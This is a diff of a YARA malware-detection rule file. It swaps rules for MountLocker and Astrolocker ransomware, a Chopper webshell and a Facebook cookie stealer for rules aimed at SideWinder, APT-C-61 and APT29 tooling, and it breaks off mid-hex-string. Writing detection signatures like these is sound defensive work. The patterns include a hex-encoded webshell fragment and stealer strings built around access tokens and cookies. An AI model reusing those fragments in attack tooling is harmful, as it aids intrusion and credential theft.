-rule ARKBIRD_SOLG_RAN_Mountlocker_May_2021_1 : FILE
-{
-	meta:
-		description = "Detect the Mountlocker ransomware"
-		author = "Arkbird_SOLG"
-		id = "0bc0d341-4658-500e-b487-1993e5431560"
-		date = "2020-05-12"
-		modified = "2021-05-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_MountLocker_May_2021_1.yara#L1-L20"
-		license_url = "N/A"
-		logic_hash = "c0826d4c740b5c46b704b42e002602dd0cda2b6d1bf0ba5431877be8bd600b64"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "0aa8099c5a65062ba4baec8274e1a0650ff36e757a91312e1755fded50a79d47"
-		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
-		hash3 = "5eae13527d4e39059025c3e56dad966cf67476fe7830090e40c14d0a4046adf0"
-		tlp = "White"
-		adversary = "MountLocker"
-
-	strings:
-		$seq_Sep_2020_1 = { 40 53 48 81 ec f0 02 00 00 b9 e8 03 00 00 ff 15 ec 1a 00 00 bb 68 00 00 00 48 8d 4c 24 70 44 8b c3 33 d2 e8 9c 00 00 00 ba 04 01 00 00 89 5c 24 70 48 8d 8c 24 e0 00 00 00 ff 15 51 1a 00 00 48 8d 15 a2 9c 00 00 48 8d 8c 24 e0 00 00 00 ff 15 64 1a 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 48 8d 94 24 e0 00 00 00 48 8d 44 24 70 45 33 c0 48 89 44 24 40 33 c9 48 83 64 24 38 00 48 83 64 24 30 00 c7 44 24 28 10 00 00 00 83 64 24 20 00 ff 15 c1 19 00 00 8b d8 85 c0 74 16 48 8b 4c 24 58 ff 15 50 1a 00 00 48 8b 4c 24 50 ff 15 45 1a 00 00 8b c3 48 81 c4 f0 02 }
-		$seq_Sep_2020_2 = { 68 00 00 00 f0 6a 01 68 a0 51 00 10 57 8d 45 f8 89 5d f4 50 89 7d f8 89 7d fc ff 15 30 50 00 10 85 c0 0f 84 81 00 00 00 8d 45 fc 50 57 57 68 14 01 00 00 68 d0 d0 00 10 ff 75 f8 ff 15 08 50 00 10 8b f0 85 f6 74 26 68 00 01 00 00 8d 45 f4 50 68 60 42 01 10 57 6a 01 57 ff 75 fc ff 15 04 50 00 10 ff 75 fc 8b f0 ff 15 00 50 00 10 57 ff 75 f8 ff 15 0c 50 00 10 }
-		$seq_Jan_2021_1 = { 48 21 4d 77 4c 8d 05 [2] 00 00 48 21 4d 6f ?? 8b ?? 48 8d 4d 77 [6-9] c7 44 24 20 00 00 00 f0 ff 15 [2] 00 00 85 c0 0f 84 [2] 00 00 48 8b 4d 77 48 8d 45 6f 48 89 44 24 28 48 8d [3] 00 00 83 64 24 20 00 [2-5] c9 41 b8 14 01 00 00 ff 15 [2] 00 00 8b d8 85 c0 74 3b 48 8b 4d 6f 48 8d 45 67 c7 44 24 30 00 01 00 00 45 33 c9 48 89 44 24 28 ?? 8b ?? 48 8d 05 [2-3] 00 33 d2 48 89 44 24 20 ff 15 [2] 00 00 48 8b 4d 6f 8b d8 ff 15 [2] 00 00 48 8b 4d 77 33 d2 ff 15 [2] 00 00 85 db [4-12] 00 00 48 8d }
-		$seq_Jan_2021_2 = { 4c 8d 05 20 47 00 00 41 8b ce 48 8d 15 1e 47 00 00 e8 [2] 00 00 ba 04 01 00 00 48 8d 4c 24 40 ff 15 ?? 43 00 00 85 c0 75 12 b8 5c 00 00 00 c7 44 24 40 43 00 3a 00 66 89 44 24 44 89 6c 24 38 4c 8d 8c 24 78 02 00 00 48 89 6c 24 30 48 8d 4c 24 40 48 89 6c 24 28 45 33 c0 33 d2 48 89 6c 24 20 66 89 6c 24 46 ff 15 6b 44 00 00 44 8b 84 24 78 02 00 00 48 8d 15 e4 45 00 00 85 c0 b9 bd 07 a2 41 44 0f 44 c1 41 8b c8 44 89 84 24 78 02 00 00 c1 c9 09 41 8b c0 89 4c 24 28 45 8b c8 c1 c8 06 48 8d 4c 24 40 41 c1 c9 03 89 44 24 20 ff 15 8b 44 00 00 4c 8d 44 24 40 33 d2 33 c9 ff 15 ?? 42 00 00 48 85 c0 74 1b ff 15 [2] 00 00 3d b7 00 00 00 74 0e bf 01 00 00 00 48 8d 15 fe 45 00 00 eb 09 8b fd 48 8d 15 a3 45 00 00 41 8b }
 
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
-}
-rule ARKBIRD_SOLG_RAN_Astrolocker_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Sidewinder_NET_Loader_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect the Astrolocker ransomware"
+		description = "Detected the NET loader used by SideWinder group (August 2020)"
 		author = "Arkbird_SOLG"
-		id = "f2c2c96a-277e-575b-8d80-4729f4a1cfe4"
-		date = "2020-05-12"
-		modified = "2021-05-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_Astrolocker_May_2021_1.yara#L1-L18"
+		id = "7334a3b8-cd56-5820-a073-5bd22076644f"
+		date = "2020-08-24"
+		modified = "2020-08-24"
+		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/SideWinder/APT_SideWinder_NET_Loader_Aug_2020_1.yar#L3-L21"
 		license_url = "N/A"
-		logic_hash = "7e50642f5f864b7cffeb5ccf4581ac7566da24fd5361a3303a860f036cd6d439"
-		score = 50
-		quality = 75
+		logic_hash = "b40127cd845d75ef81eb230c12635da00dd77fc53e5886c253a2466627aa8534"
+		score = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "7fe1686f4afb9907f880a5e77bf30bc00fae71980f57ca70b60b7b1716456a2f"
-		hash2 = "b26749b17ca691328ba67ee49d4d9997c101966c607ab578afad204459b7bf8f"
-		tlp = "White"
-		adversary = "-"
-		level = "Experimental"
+		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
 
 	strings:
-		$seq_Mar_2021_1 = { 6a 00 6a 00 ff 15 88 60 41 00 81 3d cc e6 b8 02 57 0f 00 00 8b 0d b4 c4 41 00 8b 15 b8 c4 41 00 a1 bc c4 41 00 89 4c 24 2c 89 54 24 20 89 44 24 24 75 14 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 28 60 41 00 8b 2d a8 60 41 00 c7 44 24 1c 20 00 00 00 8d 9b 00 00 00 00 8b 54 24 18 8b ce c1 e1 04 03 4c 24 20 8b c6 c1 e8 05 89 4c 24 14 8d 0c 32 89 44 24 10 8b 44 24 24 01 44 24 10 31 4c 24 14 81 3d cc e6 b8 02 f5 03 00 00 c7 05 0c da b8 02 36 06 ea e9 75 08 6a 00 ff 15 5c 60 41 00 8b 4c 24 14 31 4c 24 10 83 3d cc e6 b8 02 42 75 30 6a 00 6a 00 6a 00 ff d5 6a 30 8d 54 24 3c 6a 00 52 c7 44 24 40 00 00 00 00 e8 5a 5e ff ff 83 c4 0c 6a 00 8d 44 24 38 50 6a 00 ff 15 00 60 41 00 2b 5c 24 10 8b cb c1 e1 04 81 3d cc e6 b8 02 8c 07 00 00 89 4c 24 14 75 09 6a 00 6a 00 e8 d2 eb fe ff }
-		$seq_Apr_2021_1 = { 89 44 24 38 48 8b 05 78 4e 00 00 48 89 05 b9 9e 00 00 48 8b 05 52 4e 00 00 48 89 05 b3 9e 00 00 48 8b 05 4c 4e 00 00 48 89 05 ad 9e 00 00 48 8b 05 46 4e 00 00 48 89 05 a7 9e 00 00 8b 05 51 9e }
+		$s1 = "DUSER.dll" fullword wide
+		$s2 = "UHJvZ3JhbQ==" fullword wide
+		$s3 = ".tmp           " fullword wide
+		$s4 = "U3RhcnQ=" fullword wide
+		$s5 = "Gadgets" fullword ascii
+		$s6 = "AdapterInterfaceTemplateObject" fullword ascii
+		$s7 = "FileRipper" fullword ascii
+		$s8 = "copytight @" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize < 4KB and ( ( pe.exports ( "FileRipper" ) and pe.exports ( "Gadgets" ) ) and 5 of them )
 }
-rule ARKBIRD_SOLG_APT_UNC2452_Webshell_Chopper_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT_C_61_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect exploit listener in the exchange configuration for Webshell Chopper used by UNC2452 group"
+		description = "Detect similiar structures used in the APT-C-61 maldocs"
 		author = "Arkbird_SOLG"
-		id = "174af8e1-0df0-5ad7-ac7d-a208f64cb765"
-		date = "2021-03-07"
-		modified = "2021-03-07"
+		id = "48054d32-6613-5a54-b19c-8e9b8f747c14"
+		date = "2021-12-13"
+		modified = "2021-12-14"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-07/UNC2452/APT_UNC2452_Webshell_Chopper_Mar_2021_1.yar#L1-L26"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-13/APT_APT_C_61_Dec_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "77bd7e5c10aa9cf2b407b37a76954b4eed163e36653e1fb3cde5de853f824cf0"
+		logic_hash = "be742a0ebc53f09872d5231cf367bb1e3ae04c1a70ce94610b6597e426eeb389"
 		score = 75
-		quality = 73
+		quality = 69
 		tags = "FILE"
+		hash1 = "2cc0f8a85df2b2b0dd4c6942125bf82e647e9ac7bb91467ac5c480cf5e1dd4ff"
+		hash2 = "193c921f7ab12c0066014ffad37a98ee57ecd5101dae2ddeb5e39200eb704431"
+		hash3 = "4ec021cc3dbb2b0de7313e41063026e3ef4777baf4dec2bdad7cd2d515bf0fe2"
+		tlp = "white"
+		adversary = "APT-C-61"
 
 	strings:
-		$l1 = { 20 68 74 74 70 3a 2f 2f ?? 2f 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 22 63 23 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 76 6f 69 64 20 50 61 67 65 5f 4c 6f 61 64 28 6f 62 6a 65 63 74 20 73 65 6e 64 65 72 2c 20 45 76 65 6e 74 41 72 67 73 20 65 29 7b 69 66 20 28 52 65 71 75 65 73 74 2e 46 69 6c 65 73 2e 43 6f 75 6e 74 21 3d 30 29 20 7b 20 52 65 71 75 65 73 74 2e 46 69 6c 65 73 5b 30 5d 2e 53 61 76 65 41 73 28 53 65 72 76 65 72 2e 4d 61 70 50 61 74 68 28 22 [5-14] 22 29 29 3b 7d 7d 3c 2f 73 63 72 69 70 74 3e }
-		$l2 = { 68 74 74 70 3a 2f 2f ?? 2f 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 66 75 6e 63 74 69 6f 6e 20 50 61 67 65 5f 4c 6f 61 64 28 29 7b 65 76 61 6c 28 [-] 2c 22 75 6e 73 61 66 65 22 29 3b 7d 3c 2f 73 63 72 69 70 74 3e }
-		$c1 = { 5c 4f 41 42 20 28 44 65 66 61 75 6c 74 20 57 65 62 20 53 69 74 65 29 }
-		$c2 = "ExternalUrl" fullword ascii
-		$c3 = { 49 49 53 3a 2f 2f [10-30] 2f 57 33 53 56 43 2f [1-3] 2f 52 4f 4f 54 2f 4f 41 42 }
-		$c4 = "FrontEnd\\HttpProxy\\OAB" fullword ascii
-		$c5 = "/Configuration/Schema/ms-Exch-OAB-Virtual-Directory" fullword ascii
+		$s1 = { 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 3e 53 45 54 20 [1-4] 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
+		$s2 = { 3c 2f 77 3a 72 3e 3c 77 3a 66 6c 64 53 69 6d 70 6c 65 20 77 3a 69 6e 73 74 72 3d 22 20 20 51 55 4f 54 45 20 20 }
+		$s3 = { 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
+		$s4 = { 3c 77 3a 72 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 44 44 45 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e 3c 2f 77 3a 72 3e }
 
 	condition:
-		filesize > 1KB and 1 of ( $l* ) and 3 of ( $c* )
+		uint16( 0 ) == 0x4b50 and filesize > 20KB and all of ( $s* )
 }
-
-rule ARKBIRD_SOLG_MAL_Stealer_Cookie_July_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Sidewinder_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect strings used by EdgeCookiesView and ChromeCookiesView in the ressources of the Cookie Stealer"
+		description = "Detect Sidewinder DLL decoder algorithm"
 		author = "Arkbird_SOLG"
-		id = "02a68973-73b2-572a-a358-f0edc921773a"
-		date = "2020-07-09"
-		modified = "2020-07-09"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1281154921811841026"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-09/MAL_Stealer_Cookie_July_2020_1.yar#L3-L32"
+		id = "9e948949-f38d-5a76-a34c-965ec9be070d"
+		date = "2020-11-14"
+		modified = "2020-11-15"
+		reference = "https://twitter.com/hexfati/status/1325397305051148292"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-15/APT_SideWinder_Nov_2020_1.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "63747567a9dd68ac0d16b67910957cb9bc28d7237f431ac0c76403ca810e1b94"
+		logic_hash = "661eb5510ff0aa59b38b2c023653f0a23867a2813d854fbd0a7a6b657d9ba671"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "47b2b56c961cdc78bf06eed30737232ba99424b51648418bacacd522a12ad339"
+		hash1 = "8d7ad2c603211a67bb7abf2a9fe65aefc993987dc804bf19bafbefaaca066eaa"
 
 	strings:
-		$x1 = "C:\\Users\\admin1\\AppData\\Local\\Temp\\samplebin.exe" fullword wide
-		$x2 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccount" ascii
-		$x3 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispa" ascii
-		$x4 = "Cookie:" fullword ascii
-		$x5 = "autoLoginCookie name=" fullword ascii
-		$x6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36" fullword wide
-		$s7 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSp" ascii
-		$s8 = "https://www.facebook.com/login/device-based/login/" fullword wide
-		$s9 = "api/?sid=" fullword wide
-		$s10 = "/deleteregkey" fullword ascii
-		$s11 = "Old cookies folder of Edge/IE" fullword ascii
-		$s12 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
-		$s13 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
-		$s14 = "ChromeCookiesView.exe" fullword wide
-		$s15 = "EdgeCookiesView.exe" fullword wide
-		$s16 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$s17 = "login/device-based/login" fullword ascii
-		$s18 = "c_user" fullword wide
-		$s19 = "c:\\Projects\\VS2005\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" fullword ascii
+		$s = { 13 30 05 00 ?? 00 00 00 01 00 00 11 ?? ?? 00 00 ?? ?? ?? 00 00 [30-80] 2B 16 07 08 8F 1? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2600KB and ( pe.imphash ( ) == "89c8a19cc2d9172de5901988530c700d" or ( ( 3 of ( $x* ) ) and ( 8 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize > 3KB and $s
 }
-rule ARKBIRD_SOLG_MAL_Mailo_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT29_Fatduke_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Mach-O malware"
+		description = "Detect Fatduke implant used by APT29 group"
 		author = "Arkbird_SOLG"
-		id = "4c975200-fce4-5a2a-b565-6d397c4e0b1c"
-		date = "2021-06-09"
-		modified = "2021-06-21"
-		reference = "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/MAIL-O/MAL_MailO_Jun_2021_1.yara#L1-L19"
+		id = "aed6d6f0-1baf-5842-8ced-e07f213ef1ff"
+		date = "2021-03-08"
+		modified = "2021-03-10"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_Fatduke_Mar_2021_1.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "165c5fd90039c14ef1fa1e80bb7f14761e991b09560c5f1da2ddf9a0eadee623"
-		score = 75
-		quality = 75
+		logic_hash = "2aec00355b14ec81f577527d3eba1f682ce96cc9e6ac7727b3865ddf01ddf69a"
+		score = 50
+		quality = 67
 		tags = "FILE"
-		hash1 = "3a77f108e32b34e184f9ade66292cd73abbd297b4829ba63a973a400cc7f3f9f"
-		hash2 = "603881f4c80e9910ab22f39717e8b296910bff08cd0f25f78d5bff1ae0dce5d7"
-		tlp = "White"
-		adversary = "TA428"
+		hash1 = "0be57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57"
+		level = "Experimental"
 
 	strings:
-		$seq1 = { 48 8b ce e8 9e 0c f9 ff 48 8b 5c 24 20 48 8b 4c 24 28 49 8b d7 41 ff c5 ff 15 20 72 08 00 4c 8b f8 48 85 c0 0f 85 4c ff ff ff 48 8b b4 24 88 00 00 00 48 8b 4c 24 28 33 d2 ff 15 f7 71 08 00 4c 8b ac 24 90 00 00 00 4d 85 e4 0f 84 7f 01 00 00 48 8b ac 24 80 00 00 00 4d 8b c4 48 8b cd 48 8b d6 ff 53 48 49 8b cc 8b f0 e8 88 2c f8 ff 4c 8b bc 24 98 00 00 00 85 c0 0f 8e fb 00 00 00 0f 1f 84 00 00 00 00 00 41 8b d6 49 8b cc e8 95 2e f8 ff 48 8b f8 44 3b f6 75 75 49 89 07 e9 c4 00 00 00 48 8b 5c 24 20 45 33 c0 48 8b ce 41 8d 50 01 e8 a1 4b f9 ff 85 c0 0f 84 43 ff ff ff 49 8b d7 48 8b cb e8 ce e7 ff ff 48 8b d8 48 85 c0 0f 84 2c ff ff ff 49 8b cf ff 15 71 71 08 00 8b 15 ff e0 12 00 4c 8b c3 48 8b ce 48 89 03 e8 45 0c f9 ff 4d 85 e4 75 08 e8 2b 2b f8 ff 4c 8b e0 48 8b d6 49 8b cc e8 cd 2c f8 ff e9 fa fe ff ff 8b 15 ce e0 12 00 48 8b cf e8 ca 0b f9 ff 48 8b d8 48 85 c0 74 39 48 8b 48 10 ff 15 d8 70 08 00 48 8b 4b 08 33 d2 ff 15 d4 70 08 00 48 8b 0b 48 85 c9 74 06 ff 15 0e 71 08 00 41 b8 3a 06 00 00 48 8d 15 b1 71 0d 00 }
-		$seq2 = { 4c 8d 84 24 d0 00 00 00 4c 89 b4 24 90 01 00 00 48 8d 15 d8 a2 17 00 48 8b cd e8 50 e1 ff ff 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 0c 83 7c 24 44 01 75 05 41 b6 01 eb 03 45 32 f6 48 8b 5c 24 28 45 84 f6 74 14 f6 85 74 0e 00 00 08 74 0b 48 8b d3 48 8b ce e8 15 03 00 00 48 8b cb e8 5d f4 ff ff 45 84 f6 74 17 f7 85 74 0e 00 00 00 10 00 00 74 0b 48 8b d3 48 8b cd e8 d1 01 00 00 48 83 bd 38 07 00 00 00 74 33 b2 01 48 8b cd e8 1d f1 fe ff 48 8b 8d 40 07 00 00 45 33 c0 48 8b d3 ff 95 38 07 00 00 33 d2 48 8b cd 44 8b f0 e8 fd f0 fe ff 41 83 fe 02 75 51 41 b4 01 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 5a 48 8d 4c 24 50 e8 ac 81 02 00 44 8b 44 24 40 44 8b c8 48 8b d3 48 8b ce e8 d9 f8 ff ff 8b f8 85 c0 74 37 48 8b d3 48 8b ce e8 68 eb ff ff b8 07 00 00 00 83 ff 01 0f 44 f8 }
-		$seq3 = { 48 8b d0 48 8d 4d 80 41 ff d4 48 8b cb ff 15 f2 fa 1e 00 48 8d 95 e0 00 00 00 48 8d 4d 80 41 ff d7 f6 47 3c 02 48 8d 8d 90 00 00 00 48 0f 44 4c 24 50 e8 f6 04 00 00 4c 8b f0 48 85 c0 0f 84 05 fe ff ff 48 8b 47 28 49 8b d6 4c 8b 0f 4c 8b 47 10 48 85 c0 74 53 48 8d 8d e0 00 00 00 48 89 4c 24 40 48 8d 0d 94 90 15 00 48 89 44 24 38 8b 47 38 89 44 24 30 48 8b 47 08 48 89 44 24 28 48 8b 44 24 58 48 89 44 24 20 e8 e0 42 fc ff 48 8b 4f 28 48 8d 15 b9 8e 15 00 48 8b d8 e8 3d 7a fd ff 85 c0 74 2a ff 47 38 eb 25 48 8d 85 e0 00 00 00 48 89 44 24 28 48 8d 0d a1 90 15 00 48 8b 44 24 58 48 89 44 24 20 e8 a2 42 fc ff 48 8b d8 49 8b ce ff 15 2e fa 1e 00 48 85 db 0f 84 68 fd ff ff 4c 8b 47 20 4d 85 c0 74 27 48 8b d3 48 8d 0d aa 90 15 00 e8 75 42 fc ff 48 8b cb 4c 8b f0 ff 15 01 fa 1e 00 4d 85 f6 0f 84 3b fd ff ff 49 8b de 4c 8b 47 30 4d 85 c0 74 27 48 8b d3 48 8d 0d 8a 90 15 00 e8 45 42 fc ff 48 8b cb 4c 8b f0 ff 15 d1 f9 1e 00 4d 85 f6 0f 84 0b fd ff ff 49 8b de f6 47 3c 02 74 27 48 8b d3 48 8d 0d 75 90 15 00 e8 18 42 fc ff 48 8b cb 48 8b f8 ff 15 a4 f9 1e 00 48 }
-		$seq4 = { 48 81 ec 08 03 00 00 48 8b 05 e2 61 23 00 48 33 c4 48 89 84 24 f0 02 00 00 33 d2 48 8d 8c 24 e0 00 00 00 41 b8 08 02 00 00 e8 c2 f5 16 00 41 b8 04 01 00 00 48 8d 94 24 e0 00 00 00 48 8d 0d c5 94 21 00 ff 15 07 ee 18 00 48 8d 8c 24 e0 00 00 00 ff 15 d1 ef 18 00 85 c0 74 63 33 d2 48 8d 4c 24 70 44 8d 42 68 e8 85 f5 16 00 b8 05 00 00 00 c7 44 24 70 68 00 00 00 66 89 84 24 b0 00 00 00 48 8d 8c 24 e0 00 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 45 33 c0 48 8d 44 24 70 33 d2 48 89 44 24 40 33 c0 48 89 44 24 38 48 89 44 24 30 89 44 24 28 89 44 24 20 ff 15 52 ed 18 00 48 8b 8c 24 f0 02 00 00 48 33 cc e8 c2 cf 16 00 48 }
-		$seq5 = { 48 89 74 24 48 48 8d 0d 99 5e 18 00 4c 89 74 24 50 48 8b d5 4c 89 7c 24 58 e8 5f 13 17 00 4c 8d b7 0c 08 00 00 49 63 06 85 c0 0f 84 b0 00 00 00 48 8b c8 48 c1 e1 03 ff 15 a8 5f 22 00 48 8b f0 48 85 c0 0f 84 04 01 00 00 45 33 ff ba 00 01 00 00 41 8b df 90 48 8b 07 48 85 c0 74 16 4c 39 78 28 74 08 8b cb ff c3 48 89 04 ce 48 8b 00 48 85 c0 75 ea 48 83 c7 08 48 83 ea 01 75 d8 49 63 16 4c 8d 0d ce 01 00 00 41 b8 08 00 00 00 48 8b ce e8 c0 14 17 00 85 db 74 3e 4c 8b f6 49 8b 0e e8 c1 03 00 00 48 8b f8 48 8b cd 48 85 c0 0f 84 85 00 00 00 4c 8b c0 48 8d 15 58 5a 18 00 e8 33 a8 ff ff 48 8b cf ff 15 22 5f 22 00 41 ff c7 49 83 c6 08 44 }
+		$seq1 = { 5b 8d 8d 5c ff ff ff c7 85 5c ff ff ff 48 74 74 70 51 8d 85 6c ff ff ff c7 85 60 ff ff ff 4f 70 65 6e 50 51 8d 8d 14 fc ff ff c7 85 64 ff ff ff 52 65 71 75 c7 85 68 ff ff ff 65 73 74 57 e8 ce 7b f2 ff c6 45 fc 33 83 78 14 10 72 02 8b 00 50 8d 8d 90 fc ff ff e8 16 7b f2 ff c6 45 fc 34 8d 85 90 fc ff ff 50 8d 85 80 fb ff ff 8b cb 50 e8 bd 74 00 00 8b f0 c6 45 fc 35 8d 87 d0 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 d0 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 c3 2e f6 ff c6 45 fc 34 8d 8d 80 fb ff ff e8 a4 7e f2 ff c6 45 fc 33 83 bd a4 fc ff ff 10 72 0e ff b5 90 fc ff ff e8 71 0d 17 00 83 c4 04 c7 85 a4 fc ff ff 0f 00 00 00 c7 85 a0 fc ff ff 00 00 00 00 c6 85 90 fc ff ff 00 c6 45 fc 1b 83 bd 28 fc ff ff 10 72 0e ff b5 14 fc ff ff e8 3b 0d 17 00 83 c4 04 c7 85 28 fc ff ff 0f 00 00 00 c7 85 24 fc ff ff 00 00 00 00 c6 85 14 fc ff ff 00 57 bf 0b 3b 0e 02 31 cf 21 d7 21 ff bf 2b 34 81 13 21 c7 09 cf 5f 56 be 22 0c d2 00 be 80 41 78 6d 31 e6 21 ee be 55 13 41 71 90 5e 8d 8d 1c ff ff ff c7 85 1c ff ff ff 48 74 74 70 51 8d 85 32 ff ff ff c7 85 20 ff ff ff 41 64 64 52 50 51 8d 8d 2c fc ff ff c7 85 24 ff ff ff 65 71 75 65 c7 85 28 ff ff ff 73 74 48 65 c7 85 2c ff ff ff 61 64 65 72 66 c7 85 30 ff ff ff 73 57 e8 67 7a f2 ff c6 45 fc 36 83 78 14 10 72 02 8b 00 50 8d 8d 38 fd ff ff e8 af 79 f2 ff c6 45 fc 37 8d 85 38 fd ff ff 50 8d 85 c8 fb ff ff 8b cb 50 e8 36 b1 ff ff 8b f0 c6 45 fc 38 8d 87 e8 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 e8 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 5c 2d f6 ff c6 45 fc 37 8d 8d c8 fb ff ff e8 3d 7d f2 ff c6 45 fc 36 83 bd 4c fd ff ff 10 72 0e ff b5 38 fd ff ff e8 0a 0c 17 00 83 c4 04 c7 85 4c fd ff ff 0f 00 00 00 c7 85 48 fd ff ff 00 00 00 00 c6 85 38 fd ff ff 00 c6 45 fc 1b 83 bd 40 fc ff ff 10 72 0e ff b5 2c fc ff ff e8 d4 0b 17 00 83 c4 04 c7 85 40 fc ff ff 0f 00 00 00 c7 85 3c fc ff ff 00 00 00 00 c6 85 2c fc ff ff 00 50 b8 dc 4d a8 4d b8 4f 50 97 15 b8 97 55 f0 68 01 c0 01 e8 90 58 50 b8 e6 6f 71 3c 21 e0 21 e8 21 f0 21 c0 31 f0 b8 fa 02 db 55 58 8d 8d 7c ff ff ff c7 85 7c ff ff ff 48 74 74 70 51 8d 45 8c c7 45 80 53 65 6e 64 50 51 8d 8d 60 fc ff ff c7 45 84 52 65 71 75 c7 45 88 65 73 74 57 e8 1f 79 f2 ff c6 45 fc 39 83 78 14 10 72 02 8b 00 50 8d 8d 08 fd ff ff e8 67 78 f2 ff c6 45 fc 3a 8d 85 08 fd ff ff 50 8d 85 f8 fb ff ff 8b cb 50 e8 4e 75 00 00 8b f0 c6 45 fc 3b 8d 87 00 01 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 00 01 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 14 2c f6 ff c6 45 fc 3a 8d 8d f8 fb ff ff e8 f5 7b f2 ff c6 45 fc 39 83 bd 1c fd ff ff 10 72 0e ff b5 08 fd ff ff e8 c2 0a 17 00 83 c4 04 c7 85 1c fd ff ff 0f 00 00 00 c7 85 18 fd ff ff 00 00 00 00 c6 85 08 fd ff ff 00 c6 45 fc 1b 83 bd 74 fc ff ff 10 72 0e ff b5 60 fc ff ff e8 8c 0a 17 00 83 c4 04 c7 85 74 fc ff ff 0f 00 00 00 c7 85 70 fc ff ff 00 00 00 00 c6 85 60 fc ff ff 00 50 01 c8 21 f8 b8 f5 